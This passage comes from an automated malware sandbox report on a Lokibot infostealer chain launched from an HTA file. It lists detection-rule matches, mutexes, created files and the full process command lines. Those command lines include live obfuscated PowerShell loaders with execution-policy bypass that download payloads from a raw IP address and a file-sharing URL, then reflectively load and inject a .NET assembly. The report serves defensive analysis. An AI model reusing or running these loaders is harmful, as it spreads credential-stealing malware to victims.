                Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: powershell.exe PID: 5948, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: aspnet_compiler.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winHTA@20/23@1/3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,11_2_0040650A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,11_2_0040434D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seemybestthingswithentirelifetimethingstodomybest[1].tiffJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3056:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tz3rac5n.yvd.ps1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS"
                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: kissmegoodthingwhichgivemebestthignswithgirluaremy.htaReversingLabs: Detection: 21%
                Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\kissmegoodthingwhichgivemebestthignswithgirluaremy.hta"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCA7.tmp" "c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNTJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCA7.tmp" "c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP"Jump to behavior
